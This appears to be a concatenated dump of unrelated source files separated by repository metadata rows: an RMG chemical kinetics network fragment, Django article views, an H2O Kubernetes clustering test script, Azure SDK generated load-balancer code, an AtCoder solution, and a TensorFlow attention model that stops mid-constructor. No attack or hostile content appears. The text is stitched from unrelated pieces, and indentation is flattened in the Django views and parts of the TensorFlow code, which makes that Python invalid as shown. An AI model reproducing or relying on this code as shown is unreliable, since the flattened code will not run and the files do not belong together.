products = ['[CH][CH]CC(=C)[O](6535)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(2.66e+08,'s^-1'), n=1.36, Ea=(157.318,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [cCsCJ;CsJ-HH;C]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: 1,2_shiftC"""),
)
reaction(
    label = 'reaction13',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH]=CC1([CH2])CO1(9310)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(1.18842e+14,'s^-1'), n=0.0123667, Ea=(5.39457,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [Rn;Y_rad_out;Cpri_rad_out_2H] + [R3_SS;Y_rad_out;Ypri_rad_out] for rate rule [R3_SS;O_rad;Cpri_rad_out_2H]
Euclidian distance = 2.2360679775
Multiplied by reaction path degeneracy 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction14',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH]=CC1([O])CC1(10608)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(7.38971e+10,'s^-1'), n=0.0476667, Ea=(8.08907,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Rn;C_rad_out_2H;Cpri_rad_out_2H] for rate rule [R3_SS;C_rad_out_2H;Cpri_rad_out_2H]
Euclidian distance = 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction15',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH2]C1([CH2])C=CO1(10601)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4;Y_rad_out;Ypri_rad_out] for rate rule [R4_SSD;O_rad;CdsinglepriH_rad_out]
Euclidian distance = 2.44948974278
family: Birad_recombination"""),
)
reaction(
label = 'reaction16',
reactants = ['[CH]=CC([CH2])([CH2])[O](9680)'],
products = ['[CH2]C1([O])C=CC1(10609)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(3.24e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4;C_rad_out_2H;Ypri_rad_out] for rate rule [R4_SSD;C_rad_out_2H;CdsinglepriH_rad_out]
Euclidian distance = 2.2360679775
Multiplied by reaction path degeneracy 2.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction17',
reactants = ['O(T)(63)', '[CH]C=C([CH2])[CH2](6422)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(93609.6,'m^3/(mol*s)'), n=1.13083, Ea=(163.847,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""From training reaction 2 used for Y_rad;O_birad
Exact match found for rate rule [Y_rad;O_birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction18',
reactants = ['CH2(T)(28)', '[CH]C=C([CH2])[O](5297)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(1.14854e+06,'m^3/(mol*s)'), n=0.575199, Ea=(34.3157,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction19',
reactants = ['H(8)', '[CH]C([CH2])([O])C=[CH](10610)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
reaction(
label = 'reaction20',
reactants = ['H(8)', '[C]=CC([CH2])([CH2])[O](10611)'],
products = ['[CH]=CC([CH2])([CH2])[O](9680)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1e+07,'m^3/(mol*s)'), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [H_rad;Birad]
Euclidian distance = 0
family: Birad_R_Recombination"""),
)
network(
label = '2841',
isomers = [
'[CH]=CC([CH2])([CH2])[O](9680)',
],
reactants = [
('C#C(582)', '[CH2]C(=C)[O](4273)'),
],
bathGas = {
'N2': 0.25,
'Ne': 0.25,
'He': 0.25,
'Ar': 0.25,
},
)
pressureDependence(
label = '2841',
Tmin = (1200,'K'),
Tmax = (1500,'K'),
Tcount = 10,
Tlist = ([1201.48,1213.22,1236.21,1269.31,1310.55,1356.92,1404.16,1447.02,1479.84,1497.7],'K'),
Pmin = (1,'atm'),
Pmax = (10,'atm'),
Pcount = 10,
Plist = ([1.02771,1.14872,1.41959,1.89986,2.67608,3.83649,5.40396,7.23219,8.93758,9.98989],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
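
# The network block above declares the unimolecular isomer and the bimolecular
# reactant channel together with the bath-gas composition; pressureDependence
# then sets up a modified-strong-collision master-equation calculation over the
# listed temperature/pressure grids and fits k(T, P) to a (Chebyshev, 6, 4)
# interpolation model.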
6028ec0837d82763699b394753bc8459206e12af | 8b2ff2f65b8bc55d1a4643e29cc6f30d6cba5688 | /live/django_form/articles/views.py | 425af1be08ecd3ce793270e9b42caa24c3d60822 | [] | no_license | chloe-codes1/Django | a177161a89b3f3592b04c5711246847d4f0dd32f | 496d7219d7f9aa7269d160f46f2efa4b9bf07431 | refs/heads/master | 2023-08-07T21:27:34.523326 | 2023-05-27T13:10:22 | 2023-05-27T13:10:22 | 250,606,673 | 0 | 1 | null | 2023-09-04T08:49:57 | 2020-03-27T17:57:34 | Python | UTF-8 | Python | false | false | 1,759 | py | from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.http import require_POST
from .models import Article
from .forms import ArticleForm
# Create your views here.
def index(request):
articles = Article.objects.order_by('-pk')
context = {
'articles': articles
}
return render(request, 'articles/index.html', context)
def create(request):
if request.method == 'POST':
        # POST /articles/new -> what the (old) separate create() view used to handle
form = ArticleForm(request.POST)
        # Validate the submitted data
if form.is_valid():
article = form.save()
            # form.save() returns the saved Article instance
return redirect('articles:index')
else:
# GET /articles/new
form = ArticleForm()
    # context shared by the GET branch and a failed POST
context = {
'form': form
}
return render(request, 'articles/form.html', context)
def detail(request, pk):
article = get_object_or_404(Article, id=pk)
context = {
'article': article
}
return render(request, 'articles/detail.html', context)
@require_POST
def delete(request, pk):
article = get_object_or_404(Article, id=pk)
article.delete()
return redirect('articles:index')
def update(request, pk):
article = get_object_or_404(Article, id=pk)
if request.method == 'POST':
        form = ArticleForm(request.POST, instance=article)
if form.is_valid():
article = form.save()
return redirect('articles:detail', article.pk)
else:
        # when editing, the existing article instance must be passed in!
form = ArticleForm(instance=article)
context = {
        'form': form
}
    return render(request, 'articles/form.html', context)
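
# Illustrative sketch (an assumption, not part of this file): the ArticleForm
# imported from .forms above is presumably a ModelForm along these lines, living
# in articles/forms.py; the real project may declare different fields/widgets.
#
#     from django import forms
#     from .models import Article
#
#     class ArticleForm(forms.ModelForm):
#         class Meta:
#             model = Article
#             fields = ['title', 'content']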
b8f094584d71326d60fc7d0ae1dc6345b4a8c508 | db12b990924703cd74748d8585cd9c11fafa6746 | /h2o-k8s/tests/clustering/assisted-clustering.py | 7a76ab10eaba664de63a610c5d9aaabf790e4cb0 | [
"Apache-2.0"
] | permissive | h2oai/h2o-3 | 919019a8f297eec676011a9cfd2cc2d97891ce14 | d817ab90c8c47f6787604a0b9639b66234158228 | refs/heads/master | 2023-08-17T18:50:17.732191 | 2023-08-17T16:44:42 | 2023-08-17T16:44:42 | 17,371,412 | 6,872 | 2,345 | Apache-2.0 | 2023-09-14T18:05:40 | 2014-03-03T16:08:07 | Jupyter Notebook | UTF-8 | Python | false | false | 7,324 | py | import requests
import argparse
import sys
import os
import time
from kubernetes import client, config, watch
def wait_deployment_ready(deployment_name: str, namespace: str) -> client.V1Deployment:
"""
Waits until a deployment of given name is reported to be in status `Ready` by Kubernetes.
    A deployment is ready once all its underlying pods are ready. This means there is H2O running inside each pod,
and the clustering REST API is listening for an incoming flatfile.
:param deployment_name: Name of the H2O deployment to find the correct H2O deployment
:param namespace: Namespace the deployment belongs to.
:return: An instance of V1Deployment, if found.
"""
print("Waiting for H2O deployment to be ready")
v1_apps = client.AppsV1Api()
w = watch.Watch()
for deployment in w.stream(v1_apps.list_namespaced_deployment, namespace,
field_selector="metadata.name={}".format(deployment_name), _request_timeout=360):
deployment = deployment["object"]
status: client.V1DeploymentStatus = deployment.status
if status.ready_replicas == status.replicas:
print("H2O deployment ready")
return deployment
def create_h2o_cluster(deployment_name: str, namespace: str) -> [str]:
"""
Orchestrates the creation/clustering of an H2O cluster.
:param deployment_name: Name of the H2O deployment to find the correct H2O deployment
:param namespace: Namespace the deployment belongs to.
:return: A list of pod IPs (IPv4), each IP in a separate string.
"""
config.load_incluster_config()
print("Kubeconfig Loaded")
deployment = wait_deployment_ready(deployment_name, namespace)
print(deployment)
return cluster_deployment_pods(deployment, namespace)
def cluster_deployment_pods(deployment: client.V1Deployment, namespace: str) -> [str]:
"""
Orchestrates the clustering process of H2O nodes running inside Kubernetes pods.
The label selector key is "app" - this is dependent on the configuration of the resource.
:param deployment: H2O Deployment resource
:param namespace: Namespace of the deployment resource
:return: A list of pod IPs (IPv4) clustered, each IP in a separate string.
"""
    pod_label = deployment.spec.selector.match_labels["app"]
pod_ips = get_pod_ips_by_label(pod_label, namespace)
print("Detected pod_ips: {}".format(pod_ips))
send_ips_to_pods(pod_ips)
return pod_ips
def get_deployment(deployment_name: str, namespace: str) -> client.V1Deployment:
"""
    Finds the H2O deployment inside the Kubernetes cluster within the given namespace. Exits the process with status code one
to indicate a failed test if not found.
:param deployment_name: Name of the H2O deployment to find the correct H2O deployment
:param namespace: Namespace the deployment belongs to.
:return: An instance of V1Deployment, if found.
"""
v1_apps_api = client.AppsV1Api()
deployment = v1_apps_api.read_namespaced_deployment(deployment_name, namespace)
if deployment is None:
print("Deployment '{}' does not exist".format(deployment_name))
sys.exit(1)
else:
return deployment
def send_ips_to_pods(pod_ips):
"""
    Performs the actual clustering by sending every H2O pod's ClusterIP to each of the pods in the form
    of a flatfile, as defined by H2O's NetworkInit.java class.
:param pod_ips: A list of pod IPs (IPv4), each IP in a separate string.
"""
flatfile_body = ""
for i in range(len(pod_ips)):
if i == len(pod_ips) - 1:
flatfile_body += "{}:54321".format(pod_ips[i]) # no \n after last flatfile record
else:
flatfile_body += "{}:54321\n".format(pod_ips[i])
for pod_ip in pod_ips:
url = "http://{}:8080/clustering/flatfile".format(pod_ip)
headers = {"accept": "*/*",
"Content-Type": "text/plain"}
response = requests.post(url, headers=headers, data=flatfile_body)
if response.status_code != 200:
print("Unexpected response code from pod '{}'")
sys.exit(1)
def check_h2o_clustered(pod_ips):
"""
    Checks that each and every H2O pod, identified by its Kubernetes ClusterIP, reports a healthy cluster of the given size.
    If any node is unresponsive or reports a wrong cluster status, this script exits with status code 1.
:param pod_ips: A list of pod IPs (IPv4), each IP in a separate string.
"""
for pod_ip in pod_ips:
url = "http://{}:8080/cluster/status".format(pod_ip)
response = None
max_retries = 360
retries = 0
        while retries < max_retries:
            response = requests.get(url)
            if response.status_code == 200:
                break
            retries += 1  # count the attempt so the loop terminates even on persistent failures
            time.sleep(1)
        if response is None or response.status_code != 200:
print("Unable to obtain /cluster/status response from pod '{}' in time.".format(pod_ip))
sys.exit(1)
response_json = response.json()
if len(response_json["unhealthy_nodes"]) > 0:
print("Unhealthy nodes detected in the cluster: {}".format(response_json["unhealthy_nodes"]))
sys.exit(1)
if len(response_json["healthy_nodes"]) != len(pod_ips):
print("Healthy cluster with less node reported by node {}. IPs: {}".format(pod_ip,
response_json[
"healthy_nodes"]))
sys.exit(1)
print("Pod {} reporting healthy cluster:\n{}".format(pod_ip, response_json))
def get_pod_ips_by_label(pod_label: str, namespace: str) -> [str]:
"""
:param pod_label: A label of the H2O Pods used in Kubernetes to filter the pods by.
:param namespace: Kubernetes namespace the pods have been deployed to.
:return: A list of pod IPs (IPv4), each IP in a separate string.
"""
    v1_core_api = client.CoreV1Api()
    pods = v1_core_api.list_namespaced_pod(watch=False, namespace=namespace, label_selector="app={}".format(pod_label),
                                           _request_timeout=360)
pod_ips = list()
for pod in pods.items:
pod_ips.append(pod.status.pod_ip)
return pod_ips
if __name__ == '__main__':
# Performs assisted clustering on H2O Cluster inside Kubernetes.
    # To keep this script simple, as its scope is narrowed to the h2o-k8s test suite,
    # it is assumed that all H2O nodes run on the default H2O port (54321) and that the H2O pods expose that port.
#
args = argparse.ArgumentParser("H2O Assisted clustering test script")
args.add_argument("deployment_name",
help="Name of the H2O Deployment in K8S. Used as a label to find the H2O pods to cluster",
metavar="L", type=str)
args.add_argument("--namespace", required=True, help="Namespace the H2O has been deployed to",
type=str)
parsed_args = args.parse_args()
print("Attempting to cluster H2O")
deployment_name, namespace = parsed_args.deployment_name, parsed_args.namespace
pod_ips = create_h2o_cluster(deployment_name, namespace)
check_h2o_clustered(pod_ips)
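
# Example invocation (deployment and namespace names are hypothetical):
#   python assisted-clustering.py h2o-deployment --namespace h2o-test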
34a8508b05c051e30a87c9cb6406fa5fa9cd3217 | 78d35bb7876a3460d4398e1cb3554b06e36c720a | /sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_05_01/aio/operations/_load_balancer_outbound_rules_operations.py | 4ab8d34ddefaee388144231247b7c4e6d8cca28f | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | catchsrinivas/azure-sdk-for-python | e35f59b60318a31b3c940a7a3a07b61b28118aa5 | 596227a7738a5342274486e30489239d539b11d1 | refs/heads/main | 2023-08-27T09:08:07.986249 | 2021-11-11T11:13:35 | 2021-11-11T11:13:35 | 427,045,896 | 0 | 0 | MIT | 2021-11-11T15:14:31 | 2021-11-11T15:14:31 | null | UTF-8 | Python | false | false | 8,678 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerOutboundRulesOperations:
"""LoadBalancerOutboundRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_05_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name: str,
load_balancer_name: str,
**kwargs: Any
) -> AsyncIterable["_models.LoadBalancerOutboundRuleListResult"]:
"""Gets all the outbound rules in a load balancer.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerOutboundRuleListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_05_01.models.LoadBalancerOutboundRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LoadBalancerOutboundRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerOutboundRuleListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/outboundRules'} # type: ignore
async def get(
self,
resource_group_name: str,
load_balancer_name: str,
outbound_rule_name: str,
**kwargs: Any
) -> "_models.OutboundRule":
"""Gets the specified load balancer outbound rule.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param outbound_rule_name: The name of the outbound rule.
:type outbound_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: OutboundRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_05_01.models.OutboundRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.OutboundRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-05-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'outboundRuleName': self._serialize.url("outbound_rule_name", outbound_rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('OutboundRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/outboundRules/{outboundRuleName}'} # type: ignore
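
# Illustrative async usage through the generated management client (resource
# names are placeholders, error handling omitted):
#
#     from azure.identity.aio import DefaultAzureCredential
#     from azure.mgmt.network.aio import NetworkManagementClient
#
#     async def dump_outbound_rules():
#         async with NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>") as client:
#             async for rule in client.load_balancer_outbound_rules.list("my-rg", "my-lb"):
#                 print(rule.name)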
30fd9db05df431710018b687699b91fdd66bbcdb | 850d778687e3692ab2a38d4d2227391d92c21e6b | /atcoder.jp/abc051/abc051_c/Main.py | 98d9a7d6607c0487dc39d1ee50d494f2896dd483 | [] | no_license | Valkyrja3607/AtCoder | 77e2e5e66c0e8e12bb902c35f679119c6576fad7 | 9218a50b1eb83e4498845d15d9dda41fab90ed73 | refs/heads/master | 2023-07-15T20:38:52.911301 | 2018-05-30T17:56:22 | 2018-05-30T17:56:22 | 294,980,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | sx,sy,tx,ty=map(int,input().split())
x=tx-sx
y=ty-sy
print("U"*y+"R"*x+"D"*y+"L"*(x+1)+"U"*(y+1)+"R"*(x+1)+"DR"+"D"*(y+1)+"L"*(x+1)+"U")
750fb27f6a170e51ac8642a895809d77abbe5c79 | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/tlm/model/horizon.py | 7be9064ed94952c7a890c3e99e51cc021bd43131 | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 15,593 | py | from typing import List
import math
import tensorflow as tf
from models.transformer import bert_common_v2 as bc
from models.transformer.bert_common_v2 import get_shape_list2, create_attention_mask_from_size
from tlm.model import base
from tlm.model.base import mimic_pooling
from tlm.model.units import Embedding2
debug_mode = False
def init_query_key_value(num_attention_heads, attention_head_size, initializer):
query_layer = tf.keras.layers.Dense(
num_attention_heads * attention_head_size,
activation=None,
name="query",
kernel_initializer=initializer)
key_layer = tf.keras.layers.Dense(
num_attention_heads * attention_head_size,
activation=None,
name="key",
kernel_initializer=initializer)
value_layer = tf.keras.layers.Dense(
num_attention_heads * attention_head_size,
activation=None,
name="value",
kernel_initializer=initializer)
return query_layer, key_layer, value_layer
class Tensor2D:
def __init__(self, tensor_3d):
self.batch_size, self.seq_length, self.hidden_dims = get_shape_list2(tensor_3d)
self.matrix = tf.reshape(tensor_3d, [-1, self.hidden_dims])
def get_3d(self):
return tf.reshape(self.matrix, [self.batch_size, self.seq_length, -1])
def attention_layer(from_tensor: Tensor2D,
to_tensor_list: List[Tensor2D],
query_ff,
key_ff,
value_ff,
attention_mask=None,
num_attention_heads=1,
size_per_head=512,
attention_probs_dropout_prob=0.0):
def transpose_for_scores(input_tensor, batch_size, num_attention_heads,
seq_length, width):
output_tensor = tf.reshape(
input_tensor, [batch_size, seq_length, num_attention_heads, width], name="reshape_transpose_for_scores")
output_tensor = tf.transpose(a=output_tensor, perm=[0, 2, 1, 3])
return output_tensor
from_shape = get_shape_list2(from_tensor.matrix)
for to_tensor in to_tensor_list:
to_shape = get_shape_list2(to_tensor.matrix)
if len(from_shape) != len(to_shape):
raise ValueError(
"The rank of `from_tensor` must match the rank of `to_tensor`.")
# `query_layer` = [B*F, N*H]
query_layer = query_ff(from_tensor.matrix)
# `query_layer` = [B, N, F, H]
query_layer = transpose_for_scores(query_layer, from_tensor.batch_size, num_attention_heads,
from_tensor.seq_length, size_per_head)
key_layer_list = []
value_layer_list = []
for to_tensor in to_tensor_list:
# `key_layer` = [B*T, N*H]
key_layer = key_ff(to_tensor.matrix)
# `key_layer` = [B, N, T, H]
key_layer = transpose_for_scores(key_layer, to_tensor.batch_size,
num_attention_heads, to_tensor.seq_length, size_per_head)
key_layer_list.append(key_layer)
# `value_layer` = [B*T, N*H]
value_layer = value_ff(to_tensor.matrix)
# `value_layer` = [B, T, N, H]
value_layer = tf.reshape(value_layer,
[to_tensor.batch_size, to_tensor.seq_length, num_attention_heads, size_per_head],
name="value_reshape")
# `value_layer` = [B, N, T, H]
value_layer = tf.transpose(a=value_layer, perm=[0, 2, 1, 3])
value_layer_list.append(value_layer)
key_layer_all = tf.concat(key_layer_list, axis=2)
value_layer_all = tf.concat(value_layer_list, axis=2)
# Take the dot product between "query" and "key" to get the raw
# attention scores.
# `attention_scores` = [B, N, F, T]
attention_scores = tf.matmul(query_layer, key_layer_all, transpose_b=True)
attention_scores = tf.multiply(attention_scores, 1.0 / math.sqrt(float(size_per_head)))
if attention_mask is not None:
# `attention_mask` = [B, 1, F, T]
attention_mask = tf.expand_dims(attention_mask, axis=[1])
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
adder = (1.0 - tf.cast(attention_mask, tf.float32)) * -10000.0
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_scores += adder
# Normalize the attention scores to probabilities.
# `attention_probs` = [B, N, F, T]
attention_probs = tf.nn.softmax(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
# TODO restore this
# attention_probs = dropout(attention_probs, attention_probs_dropout_prob)
# `context_layer` = [B, N, F, H]
context_layer = tf.matmul(attention_probs, value_layer_all)
# `context_layer` = [B, F, N, H]
context_layer = tf.transpose(a=context_layer, perm=[0, 2, 1, 3])
# `context_layer` = [B*F, N*V]
context_layer = tf.reshape(
context_layer,
[from_tensor.batch_size * from_tensor.seq_length, num_attention_heads * size_per_head])
return context_layer
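
# Note: unlike the single-memory self-attention in stock BERT, `to_tensor_list`
# lets one query block attend over several memory blocks at once; the per-block
# keys and values are concatenated along the sequence axis (axis=2 above)
# before the softmax.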
class AttentionUnit(tf.keras.layers.Layer):
def __init__(self, num_attention_heads, attention_head_size, hidden_size,
hidden_dropout_prob,
attention_probs_dropout_prob, initializer):
super(AttentionUnit, self).__init__()
query_layer, key_layer, value_layer \
= init_query_key_value(num_attention_heads, attention_head_size, initializer)
output_layer = tf.keras.layers.Dense(hidden_size, kernel_initializer=initializer)
self.num_attention_heads = num_attention_heads
self.attention_head_size = attention_head_size
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.hidden_dropout_prob = hidden_dropout_prob
self.sub_layers = {
'query': query_layer,
'key': key_layer,
'value': value_layer,
'output': output_layer
}
def __call__(self, inputs):
from_tensor, to_tensor_list, attention_mask = inputs
attention_output = attention_layer(
from_tensor=from_tensor,
to_tensor_list=to_tensor_list,
query_ff=self.sub_layers['query'],
key_ff=self.sub_layers['key'],
value_ff=self.sub_layers['value'],
attention_mask=attention_mask,
num_attention_heads=self.num_attention_heads,
size_per_head=self.attention_head_size,
attention_probs_dropout_prob=self.attention_probs_dropout_prob,
)
attention_output = self.sub_layers['output'](attention_output)
attention_output = bc.dropout(attention_output, self.hidden_dropout_prob)
attention_output = bc.layer_norm(attention_output + from_tensor.matrix)
return attention_output
class ResidualFeedforward(tf.keras.layers.Layer):
def __init__(self, hidden_size, intermediate_size, hidden_act, hidden_dropout_prob, initializer):
super(ResidualFeedforward, self).__init__()
self.intermediate_ff = bc.dense(intermediate_size, initializer,
activation=bc.get_activation(hidden_act))
self.hidden_dropout_prob = hidden_dropout_prob
self.output_ff = bc.dense(hidden_size, initializer)
def __call__(self, inputs):
intermediate_output = self.intermediate_ff(inputs)
layer_output = self.output_ff(intermediate_output)
layer_output = bc.dropout(layer_output, self.hidden_dropout_prob)
layer_output = bc.layer_norm(layer_output + inputs)
return layer_output
class ForwardColumn(tf.keras.layers.Layer):
def __init__(self, config):
super(ForwardColumn, self).__init__()
hidden_size = config.hidden_size
initializer = bc.create_initializer(config.initializer_range)
attention_head_size = int(hidden_size / config.num_attention_heads)
self.attention_head_size = attention_head_size
num_attention_heads = config.num_attention_heads
self.num_attention_heads = num_attention_heads
self.attention_probs_dropout_prob = config.attention_probs_dropout_prob
self.hidden_dropout_prob = config.hidden_dropout_prob
self.attention_unit = AttentionUnit(num_attention_heads,
attention_head_size,
hidden_size,
config.hidden_dropout_prob,
config.attention_probs_dropout_prob,
initializer)
self.residual_ff = ResidualFeedforward(hidden_size,
config.intermediate_size,
config.hidden_act,
config.hidden_dropout_prob,
initializer)
self.attention_mask = None
def __call__(self,
from_tensor: Tensor2D,
to_tensor_list: List[Tensor2D]
):
e = from_tensor, to_tensor_list, self.attention_mask
if debug_mode:
with tf.compat.v1.variable_scope("attention"):
attention_output = self.attention_unit(e)
else:
attention_output = self.attention_unit(e)
if debug_mode:
with tf.compat.v1.variable_scope("feed_forward"):
layer_output = self.residual_ff(attention_output)
else:
layer_output = self.residual_ff(attention_output)
from_tensor.matrix = layer_output
return from_tensor
def check_attention_mask(self, from_tensor, to_tensor_mask):
if self.attention_mask is None:
self.attention_mask = create_attention_mask_from_size(from_tensor.batch_size,
from_tensor.seq_length,
to_tensor_mask)
class HorizontalAlpha(base.BertModelInterface):
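    # Overview (descriptive, inferred from the code below): the projected input
    # tokens form the main column and are joined by (num_columns - 1) blocks of
    # learned column tokens; every layer reuses the same ForwardColumn weights
    # (variable_scope "layer" with reuse), and each column cross-attends to the
    # concatenation of all columns.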
def __init__(self, config, is_training, use_one_hot_embeddings):
super(HorizontalAlpha, self).__init__()
if not is_training:
config.set_attrib("hidden_dropout_prob", 0.0)
